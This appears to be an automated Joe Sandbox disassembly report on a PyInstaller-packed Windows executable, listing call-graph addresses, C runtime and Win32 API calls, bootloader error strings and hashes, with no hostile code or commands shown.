19570->19573 19574 7ff640506ba1 19573->19574 19575 7ff6404febb0 _fread_nolock MultiByteToWideChar 19574->19575 19578 7ff640506beb 19575->19578 19576 7ff640506e69 19577 7ff6404eb870 _log10_special 8 API calls 19576->19577 19579 7ff6405014e6 19577->19579 19578->19576 19580 7ff6404fc90c _fread_nolock 12 API calls 19578->19580 19582 7ff640506c23 19578->19582 19593 7ff640506d21 19578->19593 19579->19566 19580->19582 19581 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19581->19576 19583 7ff6404febb0 _fread_nolock MultiByteToWideChar 19582->19583 19582->19593 19584 7ff640506c96 19583->19584 19584->19593 19604 7ff6404fe3f4 19584->19604 19587 7ff640506d32 19589 7ff640506e04 19587->19589 19590 7ff6404fc90c _fread_nolock 12 API calls 19587->19590 19592 7ff640506d50 19587->19592 19588 7ff640506ce1 19591 7ff6404fe3f4 __crtLCMapStringW 6 API calls 19588->19591 19588->19593 19589->19593 19594 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19589->19594 19590->19592 19591->19593 19592->19593 19595 7ff6404fe3f4 __crtLCMapStringW 6 API calls 19592->19595 19593->19576 19593->19581 19594->19593 19596 7ff640506dd0 19595->19596 19596->19589 19597 7ff640506df0 19596->19597 19598 7ff640506e06 19596->19598 19600 7ff6404ffaf8 WideCharToMultiByte 19597->19600 19599 7ff6404ffaf8 WideCharToMultiByte 19598->19599 19601 7ff640506dfe 19599->19601 19600->19601 19601->19589 19602 7ff640506e1e 19601->19602 19602->19593 19603 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19602->19603 19603->19593 19605 7ff6404fe020 __crtLCMapStringW 5 API calls 19604->19605 19606 7ff6404fe432 19605->19606 19607 7ff6404fe43a 19606->19607 19610 7ff6404fe4e0 19606->19610 19607->19587 19607->19588 19607->19593 19609 7ff6404fe4a3 LCMapStringW 19609->19607 19611 7ff6404fe020 __crtLCMapStringW 5 API calls 19610->19611 19612 7ff6404fe50e __crtLCMapStringW 19611->19612 19612->19609 19614 7ff6404fb830 19625 7ff6404ff5e8 EnterCriticalSection 
19614->19625 19649 7ff6404eaa2c 19650 7ff6404e9e33 19649->19650 19652 7ff6404e9eb6 19649->19652 19651 7ff6404eb0b0 12 API calls 19650->19651 19650->19652 19651->19652 19653 7ff6404f4720 19654 7ff6404f472b 19653->19654 19662 7ff6404fe5b4 19654->19662 19675 7ff6404ff5e8 EnterCriticalSection 19662->19675 19680 7ff64050a10e 19681 7ff64050a11d 19680->19681 19683 7ff64050a127 19680->19683 19684 7ff6404ff648 LeaveCriticalSection 19681->19684 19145 7ff6404fec9c 19146 7ff6404fee8e 19145->19146 19148 7ff6404fecde _isindst 19145->19148 19147 7ff6404f43f4 _get_daylight 11 API calls 19146->19147 19165 7ff6404fee7e 19147->19165 19148->19146 19151 7ff6404fed5e _isindst 19148->19151 19149 7ff6404eb870 _log10_special 8 API calls 19150 7ff6404feea9 19149->19150 19166 7ff6405054a4 19151->19166 19156 7ff6404feeba 19157 7ff6404f9c10 _isindst 17 API calls 19156->19157 19159 7ff6404feece 19157->19159 19163 7ff6404fedbb 19163->19165 19191 7ff6405054e8 19163->19191 19165->19149 19167 7ff6405054b3 19166->19167 19168 7ff6404fed7c 19166->19168 19198 7ff6404ff5e8 EnterCriticalSection 19167->19198 19173 7ff6405048a8 19168->19173 19174 7ff6405048b1 19173->19174 19175 7ff6404fed91 19173->19175 19176 7ff6404f43f4 _get_daylight 11 API calls 19174->19176 19175->19156 19179 7ff6405048d8 19175->19179 19177 7ff6405048b6 19176->19177 19178 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19177->19178 19178->19175 19180 7ff6405048e1 19179->19180 19181 7ff6404feda2 19179->19181 19182 7ff6404f43f4 _get_daylight 11 API calls 19180->19182 19181->19156 19185 7ff640504908 19181->19185 19183 7ff6405048e6 19182->19183 19184 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19183->19184 19184->19181 19186 7ff640504911 19185->19186 19187 7ff6404fedb3 19185->19187 19188 7ff6404f43f4 _get_daylight 11 API calls 19186->19188 19187->19156 19187->19163 19189 7ff640504916 19188->19189 19190 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19189->19190 19190->19187 19199 7ff6404ff5e8 EnterCriticalSection 
19191->19199 19695 7ff6404e9fcd 19697 7ff6404e9fd2 19695->19697 19696 7ff6404eb0b0 12 API calls 19700 7ff6404e9eb6 19696->19700 19697->19697 19702 7ff6404ea13a 19697->19702 19704 7ff6404e9ca3 19697->19704 19705 7ff6404eb1d0 19697->19705 19699 7ff6404eb1d0 12 API calls 19701 7ff6404ea448 19699->19701 19703 7ff6404eb1d0 12 API calls 19701->19703 19702->19699 19702->19704 19703->19704 19704->19696 19704->19700 19712 7ff6404eb220 19705->19712 19706 7ff6404eb765 19713 7ff6404ebcd4 19706->19713 19709 7ff6404eb2d9 19710 7ff6404eb870 _log10_special 8 API calls 19709->19710 19711 7ff6404eb511 19710->19711 19711->19702 19712->19706 19712->19709 19716 7ff6404ebce8 IsProcessorFeaturePresent 19713->19716 19717 7ff6404ebcff 19716->19717 19722 7ff6404ebd88 RtlCaptureContext RtlLookupFunctionEntry 19717->19722 19723 7ff6404ebd13 19722->19723 19724 7ff6404ebdb8 RtlVirtualUnwind 19722->19724 19725 7ff6404ebbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19723->19725 19724->19723 19749 7ff6405009c0 19760 7ff6405066f4 19749->19760 19761 7ff640506701 19760->19761 19762 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19761->19762 19763 7ff64050671d 19761->19763 19762->19761 19764 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19763->19764 19765 7ff6405009c9 19763->19765 19764->19763 19766 7ff6404ff5e8 EnterCriticalSection 19765->19766 17178 7ff6404eab3c 17180 7ff6404e9e3a 17178->17180 17179 7ff6404e9eb6 17180->17179 17182 7ff6404eb0b0 17180->17182 17183 7ff6404eb0d3 17182->17183 17184 7ff6404eb0f1 memcpy_s 17182->17184 17185 7ff6404fc90c 12 API calls 17183->17185 17184->17179 17185->17184 18613 7ff6404f4938 18614 7ff6404f4952 18613->18614 18615 7ff6404f496f 18613->18615 18616 7ff6404f43d4 _fread_nolock 11 API calls 18614->18616 18615->18614 18617 7ff6404f4982 CreateFileW 18615->18617 18618 7ff6404f4957 18616->18618 18619 7ff6404f49ec 18617->18619 18620 7ff6404f49b6 18617->18620 18622 
7ff6404f43f4 _get_daylight 11 API calls 18618->18622 18664 7ff6404f4f14 18619->18664 18638 7ff6404f4a8c GetFileType 18620->18638 18625 7ff6404f495f 18622->18625 18631 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18625->18631 18627 7ff6404f49e1 CloseHandle 18632 7ff6404f496a 18627->18632 18628 7ff6404f49cb CloseHandle 18628->18632 18629 7ff6404f49f5 18633 7ff6404f4368 _fread_nolock 11 API calls 18629->18633 18630 7ff6404f4a20 18685 7ff6404f4cd4 18630->18685 18631->18632 18637 7ff6404f49ff 18633->18637 18637->18632 18639 7ff6404f4ada 18638->18639 18640 7ff6404f4b97 18638->18640 18641 7ff6404f4b06 GetFileInformationByHandle 18639->18641 18645 7ff6404f4e10 21 API calls 18639->18645 18642 7ff6404f4bc1 18640->18642 18643 7ff6404f4b9f 18640->18643 18646 7ff6404f4bb2 GetLastError 18641->18646 18647 7ff6404f4b2f 18641->18647 18644 7ff6404f4be4 PeekNamedPipe 18642->18644 18654 7ff6404f4b82 18642->18654 18643->18646 18648 7ff6404f4ba3 18643->18648 18644->18654 18649 7ff6404f4af4 18645->18649 18652 7ff6404f4368 _fread_nolock 11 API calls 18646->18652 18650 7ff6404f4cd4 51 API calls 18647->18650 18651 7ff6404f43f4 _get_daylight 11 API calls 18648->18651 18649->18641 18649->18654 18655 7ff6404f4b3a 18650->18655 18651->18654 18652->18654 18653 7ff6404eb870 _log10_special 8 API calls 18656 7ff6404f49c4 18653->18656 18654->18653 18702 7ff6404f4c34 18655->18702 18656->18627 18656->18628 18659 7ff6404f4c34 10 API calls 18660 7ff6404f4b59 18659->18660 18661 7ff6404f4c34 10 API calls 18660->18661 18662 7ff6404f4b6a 18661->18662 18662->18654 18663 7ff6404f43f4 _get_daylight 11 API calls 18662->18663 18663->18654 18665 7ff6404f4f4a 18664->18665 18666 7ff6404f4fe2 __vcrt_freefls 18665->18666 18667 7ff6404f43f4 _get_daylight 11 API calls 18665->18667 18668 7ff6404eb870 _log10_special 8 API calls 18666->18668 18669 7ff6404f4f5c 18667->18669 18670 7ff6404f49f1 18668->18670 18671 7ff6404f43f4 _get_daylight 11 API calls 18669->18671 18670->18629 18670->18630 18672 7ff6404f4f64 
18671->18672 18673 7ff6404f7118 45 API calls 18672->18673 18674 7ff6404f4f79 18673->18674 18675 7ff6404f4f81 18674->18675 18676 7ff6404f4f8b 18674->18676 18677 7ff6404f43f4 _get_daylight 11 API calls 18675->18677 18678 7ff6404f43f4 _get_daylight 11 API calls 18676->18678 18682 7ff6404f4f86 18677->18682 18679 7ff6404f4f90 18678->18679 18679->18666 18680 7ff6404f43f4 _get_daylight 11 API calls 18679->18680 18681 7ff6404f4f9a 18680->18681 18683 7ff6404f7118 45 API calls 18681->18683 18682->18666 18684 7ff6404f4fd4 GetDriveTypeW 18682->18684 18683->18682 18684->18666 18687 7ff6404f4cfc 18685->18687 18686 7ff6404f4a2d 18695 7ff6404f4e10 18686->18695 18687->18686 18709 7ff6404fea34 18687->18709 18689 7ff6404f4d90 18689->18686 18690 7ff6404fea34 51 API calls 18689->18690 18691 7ff6404f4da3 18690->18691 18691->18686 18692 7ff6404fea34 51 API calls 18691->18692 18693 7ff6404f4db6 18692->18693 18693->18686 18694 7ff6404fea34 51 API calls 18693->18694 18694->18686 18696 7ff6404f4e2a 18695->18696 18697 7ff6404f4e61 18696->18697 18698 7ff6404f4e3a 18696->18698 18699 7ff6404fe8c8 21 API calls 18697->18699 18700 7ff6404f4e4a 18698->18700 18701 7ff6404f4368 _fread_nolock 11 API calls 18698->18701 18699->18700 18700->18637 18701->18700 18703 7ff6404f4c50 18702->18703 18704 7ff6404f4c5d FileTimeToSystemTime 18702->18704 18703->18704 18706 7ff6404f4c58 18703->18706 18705 7ff6404f4c71 SystemTimeToTzSpecificLocalTime 18704->18705 18704->18706 18705->18706 18707 7ff6404eb870 _log10_special 8 API calls 18706->18707 18708 7ff6404f4b49 18707->18708 18708->18659 18710 7ff6404fea41 18709->18710 18713 7ff6404fea65 18709->18713 18711 7ff6404fea46 18710->18711 18710->18713 18714 7ff6404f43f4 _get_daylight 11 API calls 18711->18714 18712 7ff6404fea9f 18715 7ff6404f43f4 _get_daylight 11 API calls 18712->18715 18713->18712 18716 7ff6404feabe 18713->18716 18717 7ff6404fea4b 18714->18717 18718 7ff6404feaa4 18715->18718 18719 7ff6404f4178 45 API calls 18716->18719 18720 7ff6404f9bf0 
_invalid_parameter_noinfo 37 API calls 18717->18720 18721 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18718->18721 18724 7ff6404feacb 18719->18724 18722 7ff6404fea56 18720->18722 18723 7ff6404feaaf 18721->18723 18722->18689 18723->18689 18724->18723 18725 7ff6404ff7ec 51 API calls 18724->18725 18725->18724 19272 7ff6404ebe70 19273 7ff6404ebe80 19272->19273 19289 7ff6404f8ec0 19273->19289 19275 7ff6404ebe8c 19295 7ff6404ec168 19275->19295 19277 7ff6404ec44c 7 API calls 19280 7ff6404ebf25 19277->19280 19278 7ff6404ebea4 _RTC_Initialize 19287 7ff6404ebef9 19278->19287 19300 7ff6404ec318 19278->19300 19281 7ff6404ebeb9 19303 7ff6404f832c 19281->19303 19287->19277 19288 7ff6404ebf15 19287->19288 19290 7ff6404f8ed1 19289->19290 19291 7ff6404f8ed9 19290->19291 19292 7ff6404f43f4 _get_daylight 11 API calls 19290->19292 19291->19275 19293 7ff6404f8ee8 19292->19293 19294 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19293->19294 19294->19291 19296 7ff6404ec179 19295->19296 19299 7ff6404ec17e __scrt_acquire_startup_lock 19295->19299 19297 7ff6404ec44c 7 API calls 19296->19297 19296->19299 19298 7ff6404ec1f2 19297->19298 19299->19278 19328 7ff6404ec2dc 19300->19328 19302 7ff6404ec321 19302->19281 19304 7ff6404f834c 19303->19304 19305 7ff6404ebec5 19303->19305 19306 7ff6404f8354 19304->19306 19307 7ff6404f836a GetModuleFileNameW 19304->19307 19305->19287 19327 7ff6404ec3ec InitializeSListHead 19305->19327 19308 7ff6404f43f4 _get_daylight 11 API calls 19306->19308 19311 7ff6404f8395 19307->19311 19309 7ff6404f8359 19308->19309 19310 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19309->19310 19310->19305 19312 7ff6404f82cc 11 API calls 19311->19312 19313 7ff6404f83d5 19312->19313 19314 7ff6404f83dd 19313->19314 19318 7ff6404f83f5 19313->19318 19315 7ff6404f43f4 _get_daylight 11 API calls 19314->19315 19316 7ff6404f83e2 19315->19316 19317 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19316->19317 19317->19305 19319 7ff6404f8417 
19318->19319 19321 7ff6404f8443 19318->19321 19322 7ff6404f845c 19318->19322 19320 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19319->19320 19320->19305 19323 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19321->19323 19325 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19322->19325 19324 7ff6404f844c 19323->19324 19326 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19324->19326 19325->19319 19326->19305 19329 7ff6404ec2ef 19328->19329 19330 7ff6404ec2f6 19328->19330 19329->19302 19332 7ff6404f94fc 19330->19332 19335 7ff6404f9138 19332->19335 19342 7ff6404ff5e8 EnterCriticalSection 19335->19342 19410 7ff6404f9060 19413 7ff6404f8fe4 19410->19413 19420 7ff6404ff5e8 EnterCriticalSection 19413->19420 19832 7ff6404fa2e0 19833 7ff6404fa2e5 19832->19833 19834 7ff6404fa2fa 19832->19834 19838 7ff6404fa300 19833->19838 19839 7ff6404fa342 19838->19839 19840 7ff6404fa34a 19838->19840 19841 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19839->19841 19842 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19840->19842 19841->19840 19843 7ff6404fa357 19842->19843 19844 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19843->19844 19845 7ff6404fa364 19844->19845 19846 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19845->19846 19847 7ff6404fa371 19846->19847 19848 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19847->19848 19849 7ff6404fa37e 19848->19849 19850 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19849->19850 19851 7ff6404fa38b 19850->19851 19852 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19851->19852 19853 7ff6404fa398 19852->19853 19854 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19853->19854 19855 7ff6404fa3a5 19854->19855 19856 
7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19855->19856 19857 7ff6404fa3b5 19856->19857 19858 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19857->19858 19859 7ff6404fa3c5 19858->19859 19864 7ff6404fa1a4 19859->19864 19878 7ff6404ff5e8 EnterCriticalSection 19864->19878 17186 7ff6404ebf5c 17207 7ff6404ec12c 17186->17207 17189 7ff6404ec0a8 17334 7ff6404ec44c IsProcessorFeaturePresent 17189->17334 17190 7ff6404ebf78 __scrt_acquire_startup_lock 17192 7ff6404ec0b2 17190->17192 17197 7ff6404ebf96 __scrt_release_startup_lock 17190->17197 17193 7ff6404ec44c 7 API calls 17192->17193 17195 7ff6404ec0bd __FrameHandler3::FrameUnwindToEmptyState 17193->17195 17194 7ff6404ebfbb 17196 7ff6404ec041 17213 7ff6404ec594 17196->17213 17197->17194 17197->17196 17323 7ff6404f8e44 17197->17323 17199 7ff6404ec046 17216 7ff6404e1000 17199->17216 17204 7ff6404ec069 17204->17195 17330 7ff6404ec2b0 17204->17330 17208 7ff6404ec134 17207->17208 17209 7ff6404ec140 __scrt_dllmain_crt_thread_attach 17208->17209 17210 7ff6404ebf70 17209->17210 17211 7ff6404ec14d 17209->17211 17210->17189 17210->17190 17211->17210 17341 7ff6404ecba8 17211->17341 17368 7ff6405097e0 17213->17368 17215 7ff6404ec5ab GetStartupInfoW 17215->17199 17217 7ff6404e1009 17216->17217 17370 7ff6404f4794 17217->17370 17219 7ff6404e352b 17377 7ff6404e33e0 17219->17377 17222 7ff6404e3538 17225 7ff6404eb870 _log10_special 8 API calls 17222->17225 17226 7ff6404e372a 17225->17226 17328 7ff6404ec5d8 GetModuleHandleW 17226->17328 17227 7ff6404e356c 17230 7ff6404e1bf0 49 API calls 17227->17230 17228 7ff6404e3736 17229 7ff6404e3f70 108 API calls 17228->17229 17231 7ff6404e3746 17229->17231 17246 7ff6404e3588 17230->17246 17232 7ff6404e3785 17231->17232 17470 7ff6404e76a0 17231->17470 17234 7ff6404e25f0 53 API calls 17232->17234 17234->17222 17236 7ff6404e3778 17238 7ff6404e379f 17236->17238 17239 7ff6404e377d 17236->17239 17237 7ff6404e365f __vcrt_freefls 17240 7ff6404e3844 
17237->17240 17243 7ff6404e7e10 14 API calls 17237->17243 17242 7ff6404e1bf0 49 API calls 17238->17242 17241 7ff6404ef36c 74 API calls 17239->17241 17528 7ff6404e3e90 17240->17528 17241->17232 17245 7ff6404e37be 17242->17245 17247 7ff6404e36ae 17243->17247 17252 7ff6404e18f0 115 API calls 17245->17252 17439 7ff6404e7e10 17246->17439 17465 7ff6404e7f80 17247->17465 17248 7ff6404e3852 17250 7ff6404e3865 17248->17250 17251 7ff6404e3871 17248->17251 17531 7ff6404e3fe0 17250->17531 17255 7ff6404e1bf0 49 API calls 17251->17255 17256 7ff6404e37df 17252->17256 17253 7ff6404e36bd 17257 7ff6404e380f 17253->17257 17259 7ff6404e36cf 17253->17259 17270 7ff6404e3805 __vcrt_freefls 17255->17270 17256->17246 17258 7ff6404e37ef 17256->17258 17479 7ff6404e8400 17257->17479 17262 7ff6404e25f0 53 API calls 17258->17262 17263 7ff6404e1bf0 49 API calls 17259->17263 17261 7ff6404e86b0 2 API calls 17265 7ff6404e389e SetDllDirectoryW 17261->17265 17262->17222 17266 7ff6404e36f1 17263->17266 17269 7ff6404e38c3 17265->17269 17266->17270 17271 7ff6404e36fc 17266->17271 17274 7ff6404e3a50 17269->17274 17534 7ff6404e6560 17269->17534 17270->17261 17276 7ff6404e25f0 53 API calls 17271->17276 17278 7ff6404e3a5a PostMessageW GetMessageW 17274->17278 17279 7ff6404e3a7d 17274->17279 17276->17222 17278->17279 17452 7ff6404e3080 17279->17452 17281 7ff6404e38ea 17283 7ff6404e3947 17281->17283 17285 7ff6404e3901 17281->17285 17554 7ff6404e65a0 17281->17554 17283->17274 17290 7ff6404e395c 17283->17290 17297 7ff6404e3905 17285->17297 17575 7ff6404e6970 17285->17575 17609 7ff6404e30e0 17290->17609 17292 7ff6404e6780 FreeLibrary 17295 7ff6404e3aa3 17292->17295 17297->17283 17591 7ff6404e2870 17297->17591 17299 7ff6404e396c 17628 7ff6404e83e0 LocalFree 17299->17628 17324 7ff6404f8e7c 17323->17324 17325 7ff6404f8e5b 17323->17325 18556 7ff6404f96e8 17324->18556 17325->17196 17329 7ff6404ec5e9 17328->17329 17329->17204 17331 7ff6404ec2c1 17330->17331 17332 7ff6404ec080 17331->17332 17333 7ff6404ecba8 7 API 
calls 17331->17333 17332->17194 17333->17332 17335 7ff6404ec472 _isindst memcpy_s 17334->17335 17336 7ff6404ec491 RtlCaptureContext RtlLookupFunctionEntry 17335->17336 17337 7ff6404ec4ba RtlVirtualUnwind 17336->17337 17338 7ff6404ec4f6 memcpy_s 17336->17338 17337->17338 17339 7ff6404ec528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17338->17339 17340 7ff6404ec576 _isindst 17339->17340 17340->17192 17342 7ff6404ecbb0 17341->17342 17343 7ff6404ecbba 17341->17343 17347 7ff6404ecf44 17342->17347 17343->17210 17348 7ff6404ecf53 17347->17348 17350 7ff6404ecbb5 17347->17350 17355 7ff6404ed180 17348->17355 17351 7ff6404ecfb0 17350->17351 17352 7ff6404ecfdb 17351->17352 17353 7ff6404ecfbe DeleteCriticalSection 17352->17353 17354 7ff6404ecfdf 17352->17354 17353->17352 17354->17343 17359 7ff6404ecfe8 17355->17359 17365 7ff6404ed0d2 TlsFree 17359->17365 17366 7ff6404ed02c __vcrt_InitializeCriticalSectionEx 17359->17366 17360 7ff6404ed05a LoadLibraryExW 17362 7ff6404ed07b GetLastError 17360->17362 17363 7ff6404ed0f9 17360->17363 17361 7ff6404ed119 GetProcAddress 17361->17365 17362->17366 17363->17361 17364 7ff6404ed110 FreeLibrary 17363->17364 17364->17361 17366->17360 17366->17361 17366->17365 17367 7ff6404ed09d LoadLibraryExW 17366->17367 17367->17363 17367->17366 17369 7ff6405097d0 17368->17369 17369->17215 17369->17369 17373 7ff6404fe790 17370->17373 17371 7ff6404fe7e3 17372 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 17371->17372 17376 7ff6404fe80c 17372->17376 17373->17371 17374 7ff6404fe836 17373->17374 17629 7ff6404fe668 17374->17629 17376->17219 17378 7ff6404ebb70 17377->17378 17379 7ff6404e33ec GetModuleFileNameW 17378->17379 17380 7ff6404e341b 17379->17380 17381 7ff6404e3438 17379->17381 17642 7ff6404e29e0 17380->17642 17637 7ff6404e85a0 FindFirstFileExW 17381->17637 17385 7ff6404e34a5 17661 7ff6404e8760 17385->17661 17386 7ff6404e344b 17652 7ff6404e8620 CreateFileW 17386->17652 17388 7ff6404eb870 _log10_special 8 API calls 17391 
7ff6404e34dd 17388->17391 17390 7ff6404e34b3 17393 7ff6404e342e 17390->17393 17396 7ff6404e26c0 49 API calls 17390->17396 17391->17222 17399 7ff6404e18f0 17391->17399 17393->17388 17394 7ff6404e3474 __vcrt_InitializeCriticalSectionEx 17394->17385 17395 7ff6404e345c 17655 7ff6404e26c0 17395->17655 17396->17393 17400 7ff6404e3f70 108 API calls 17399->17400 17401 7ff6404e1925 17400->17401 17402 7ff6404e1bb6 17401->17402 17404 7ff6404e76a0 83 API calls 17401->17404 17403 7ff6404eb870 _log10_special 8 API calls 17402->17403 17405 7ff6404e1bd1 17403->17405 17406 7ff6404e196b 17404->17406 17405->17227 17405->17228 17408 7ff6404ef9f4 73 API calls 17406->17408 17438 7ff6404e199c 17406->17438 17407 7ff6404ef36c 74 API calls 17407->17402 17409 7ff6404e1985 17408->17409 17410 7ff6404e19a1 17409->17410 17411 7ff6404e1989 17409->17411 17413 7ff6404ef6bc _fread_nolock 53 API calls 17410->17413 17412 7ff6404e2760 53 API calls 17411->17412 17412->17438 17414 7ff6404e19b9 17413->17414 17415 7ff6404e19bf 17414->17415 17416 7ff6404e19d7 17414->17416 17417 7ff6404e2760 53 API calls 17415->17417 17418 7ff6404e19ee 17416->17418 17419 7ff6404e1a06 17416->17419 17417->17438 17421 7ff6404e2760 53 API calls 17418->17421 17420 7ff6404e1bf0 49 API calls 17419->17420 17422 7ff6404e1a1d 17420->17422 17421->17438 17423 7ff6404e1bf0 49 API calls 17422->17423 17424 7ff6404e1a68 17423->17424 17425 7ff6404ef9f4 73 API calls 17424->17425 17426 7ff6404e1a8c 17425->17426 17427 7ff6404e1aa1 17426->17427 17428 7ff6404e1ab9 17426->17428 17429 7ff6404e2760 53 API calls 17427->17429 17430 7ff6404ef6bc _fread_nolock 53 API calls 17428->17430 17429->17438 17431 7ff6404e1ace 17430->17431 17432 7ff6404e1ad4 17431->17432 17433 7ff6404e1aec 17431->17433 17435 7ff6404e2760 53 API calls 17432->17435 17670 7ff6404ef430 17433->17670 17435->17438 17437 7ff6404e25f0 53 API calls 17437->17438 17438->17407 17440 7ff6404e7e1a 17439->17440 17441 7ff6404e86b0 2 API calls 17440->17441 17442 7ff6404e7e39 
GetEnvironmentVariableW 17441->17442 17443 7ff6404e7ea2 17442->17443 17444 7ff6404e7e56 ExpandEnvironmentStringsW 17442->17444 17445 7ff6404eb870 _log10_special 8 API calls 17443->17445 17444->17443 17446 7ff6404e7e78 17444->17446 17448 7ff6404e7eb4 17445->17448 17447 7ff6404e8760 2 API calls 17446->17447 17449 7ff6404e7e8a 17447->17449 17448->17237 17450 7ff6404eb870 _log10_special 8 API calls 17449->17450 17451 7ff6404e7e9a 17450->17451 17451->17237 17676 7ff6404e5af0 17452->17676 17456 7ff6404e30a1 17460 7ff6404e30b9 17456->17460 17746 7ff6404e5800 17456->17746 17458 7ff6404e30ad 17458->17460 17755 7ff6404e5990 17458->17755 17461 7ff6404e33a0 17460->17461 17462 7ff6404e33ae 17461->17462 17463 7ff6404e33bf 17462->17463 17974 7ff6404e8180 FreeLibrary 17462->17974 17463->17292 17466 7ff6404e86b0 2 API calls 17465->17466 17467 7ff6404e7f94 17466->17467 17975 7ff6404f7548 17467->17975 17469 7ff6404e7fa6 __vcrt_freefls 17469->17253 17471 7ff6404e76c4 17470->17471 17472 7ff6404e779b __vcrt_freefls 17471->17472 17473 7ff6404ef9f4 73 API calls 17471->17473 17472->17236 17474 7ff6404e76e0 17473->17474 17474->17472 17993 7ff6404f6bd8 17474->17993 17476 7ff6404ef9f4 73 API calls 17477 7ff6404e76f5 17476->17477 17477->17472 17477->17476 17478 7ff6404ef6bc _fread_nolock 53 API calls 17477->17478 17478->17477 17480 7ff6404e8415 17479->17480 18008 7ff6404e7b50 GetCurrentProcess OpenProcessToken 17480->18008 17483 7ff6404e7b50 7 API calls 17484 7ff6404e8441 17483->17484 17485 7ff6404e8474 17484->17485 17486 7ff6404e845a 17484->17486 17488 7ff6404e2590 48 API calls 17485->17488 17487 7ff6404e2590 48 API calls 17486->17487 17489 7ff6404e8472 17487->17489 17490 7ff6404e8487 LocalFree LocalFree 17488->17490 17489->17490 17491 7ff6404e84a3 17490->17491 17494 7ff6404e84af 17490->17494 18018 7ff6404e2940 17491->18018 17493 7ff6404eb870 _log10_special 8 API calls 17495 7ff6404e3814 17493->17495 17494->17493 17496 7ff6404e7c40 17495->17496 17497 7ff6404e7c58 17496->17497 17498 

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: FileModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
• API String ID: 514040917-585287483
• Opcode ID: 2a3628e5ef8489efe408e1403b5f8cd9dc2db04713c58d7f66d9dac8dcced320
• Instruction ID: b41771169caa7e53486d63186ad72cddfcc7f537cb3ea71f10036f4f1d67ffa6
• Opcode Fuzzy Hash: 2a3628e5ef8489efe408e1403b5f8cd9dc2db04713c58d7f66d9dac8dcced320
• Instruction Fuzzy Hash: FEF17B61A0C6A2F1FA1AFB21D5582FD62A1EF95784F844032DA5DC37D6EF2CE558C380

Control-flow Graph

control_flow_graph (one basic block per line: block id, address range, calls/APIs, then the edges reported after it)
359 7ff640505c74-7ff640505ce7 call 7ff6405059a8
362 7ff640505d01-7ff640505d0b call 7ff6404f7830 359->362
363 7ff640505ce9-7ff640505cf2 call 7ff6404f43d4 359->363
368 7ff640505d0d-7ff640505d24 call 7ff6404f43d4 call 7ff6404f43f4 362->368
369 7ff640505d26-7ff640505d8f CreateFileW 362->369
370 7ff640505cf5-7ff640505cfc call 7ff6404f43f4 363->370 368->370
373 7ff640505d91-7ff640505d97 369->373
374 7ff640505e0c-7ff640505e17 GetFileType 369->374
381 7ff640506042-7ff640506062 370->381
379 7ff640505dd9-7ff640505e07 GetLastError call 7ff6404f4368 373->379
380 7ff640505d99-7ff640505d9d 373->380
376 7ff640505e6a-7ff640505e71 374->376
377 7ff640505e19-7ff640505e54 GetLastError call 7ff6404f4368 CloseHandle 374->377
384 7ff640505e73-7ff640505e77 376->384
385 7ff640505e79-7ff640505e7c 376->385 377->370
